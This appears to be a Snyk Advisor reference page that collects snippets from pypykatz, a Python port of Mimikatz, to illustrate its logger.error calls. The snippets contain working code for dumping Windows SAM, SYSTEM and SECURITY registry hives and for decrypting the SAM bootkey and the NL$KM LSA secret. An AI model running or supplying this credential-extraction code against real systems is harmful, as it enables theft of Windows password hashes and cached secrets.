1. Advisor
  2. pypykatz
  3. functions
  4. pypykatz.registry.logger.error
View all pypykatz analysis

How to use the pypykatz.registry.logger.error function in pypykatz

To help you get started, we’ve selected a few pypykatz examples, based on popular ways it is used in public projects.

Secure your code as it's written. Use Snyk Code to scan source code in minutes - no build needed - and fix issues immediately.

github skelsec / pypykatz / pypykatz / registry / offline_parser.py View on Github external
po = ProcessManipulator()
			po.set_privilege(SE_BACKUP)
		except Exception as e:
			logger.error('Failed to obtain SE_BACKUP privilege! Registry dump will not work! Reason: %s' % str(e))
			raise e
		logger.debug('Obtaining SE_BACKUP OK!')
		
		dumped_names = {}
		for reg_name, location in locations:
			logger.debug('Dumping %s...' % reg_name)
			try:
				key = winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, reg_name, access=0x00020000)
				winreg.SaveKey(key, location)
				key.Close()
			except Exception as e:
				logger.error('Dumping %s FAILED!! Reason: %s' % (reg_name, str(e)))
			else:
				logger.debug('Dumping %s OK!' % reg_name)
				dumped_names[reg_name] = location
		###
		### Do Parsing here!
		###
		po = None
		if 'SYSTEM' in dumped_names:
			try:
				po = OffineRegistry.from_files(system_name, sam_name if 'SAM' in dumped_names else None, security_name if 'SECURITY' in dumped_names else None)
			except Exception as e:
				import traceback
				traceback.print_exc()
		else:
			logger.error('Failed to dump SYSTEM hive, exiting...')
github skelsec / pypykatz / pypykatz / registry / security / security.py View on Github external
def get_NKLM_key(self):
		logger.debug('[SECURITY] Fetching NK$LM key...')
		if self.lsa_key is None:
			self.get_lsa_secret_key()
			
		value = self.hive.get_value('Policy\\Secrets\\NL$KM\\CurrVal\\default')
		if value is None:
			logger.error('[SECURITY] Could not find NL$KM in registry')
			raise Exception('Could not find NL$KM in registry :(')
			
		if self.lsa_secret_key_vista_type is True:
			self.NKLM_key = b''
			record = LSA_SECRET.from_bytes(value[1])
			key = SECURITY.sha256_multi(self.lsa_key, record.data[:32])
			cipher = AESModeOfOperationECB(key)
			n = 16
			for block in [record.data[32:][i:i+n] for i in range(0, len(record.data[32:]), n)]:  #terrible, terrible workaround
				if len(block) < n:
					block += b'\x00' * (16 - len(block))
				self.NKLM_key += cipher.decrypt(block)
			
		else:
			self.NKLM_key = self.decrypt_secret(self.lsa_key, value[1])
github skelsec / pypykatz / pypykatz / registry / offline_parser.py View on Github external
sys_hive = open(system_path, 'rb')
			po.system_hive = AIOWinRegHive(sys_hive)
		except Exception as e:
			logger.error('Failed to open SYSTEM hive! Reason: %s' % str(e))
			raise e
		
		if sam_path:
			try:
				if notfile == True:
					sam_hive = sam_path
				else:
					sam_hive = open(sam_path, 'rb')

				po.sam_hive = AIOWinRegHive(sam_hive)
			except Exception as e:
				logger.error('Failed to open SAM hive! Reason: %s' % str(e))
				raise e
				
		else:
			logger.warning('SAM hive path not supplied! Parsing SAM will not work')
			
		if security_path:
			try:
				if notfile == True:
					sec_hive = security_path
				else:
					sec_hive = open(security_path, 'rb')				
				po.security_hive = AIOWinRegHive(sec_hive)
			except Exception as e:
				logger.error('Failed to open SECURITY hive! Reason: %s' % str(e))
				raise e
github skelsec / pypykatz / pypykatz / registry / sam / sam.py View on Github external
QWERTY = b"!@#$%^&*()qwertyUIOPAzxcvbnmQQQQQQQQQQQQ)(*@&%\0"
		DIGITS = b"0123456789012345678901234567890123456789\0"
		
		F = self.hive.get_value(r'SAM\Domains\Account\F')[1]
		logger.log(1,'[SAM] F key value: %s' % F)
		
		domain_properties = DOMAIN_ACCOUNT_F.from_bytes(F)
		
		if isinstance(domain_properties.key_0, SAM_KEY_DATA):
			rc4_key = hashlib.md5(domain_properties.key_0.salt + QWERTY + self.bootkey +DIGITS).digest()
			self.hashed_bootkey = RC4(rc4_key).encrypt(domain_properties.key_0.key + domain_properties.key_0.checksum)
			
			checksum = hashlib.md5(self.hashed_bootkey[:16] + DIGITS + self.hashed_bootkey[:16] + QWERTY).digest()
			
			if checksum != self.hashed_bootkey[16:]:
				logger.error('[SAM] HBootkey checksum verification failed!')
				raise Exception('[SAM] HBootkey checksum verification failed!')
				
		elif isinstance(domain_properties.key_0, SAM_KEY_DATA_AES):
			self.hashed_bootkey = b''
			cipher = AESModeOfOperationCBC(self.bootkey, iv = domain_properties.key_0.salt)
			n = 16
			for block in [domain_properties.key_0.data[i:i+n] for i in range(0, len(domain_properties.key_0.data), n)]:  #terrible, terrible workaround
				self.hashed_bootkey += cipher.decrypt(block)
			
		logger.debug('[SAM] HBootkey: %s' % self.hashed_bootkey.hex())
		return self.hashed_bootkey

pypykatz

Python implementation of Mimikatz

GitHub
MIT
Latest version published 4 months ago

Package Health Score

74 / 100
Full package analysis

Popular pypykatz functions

Similar packages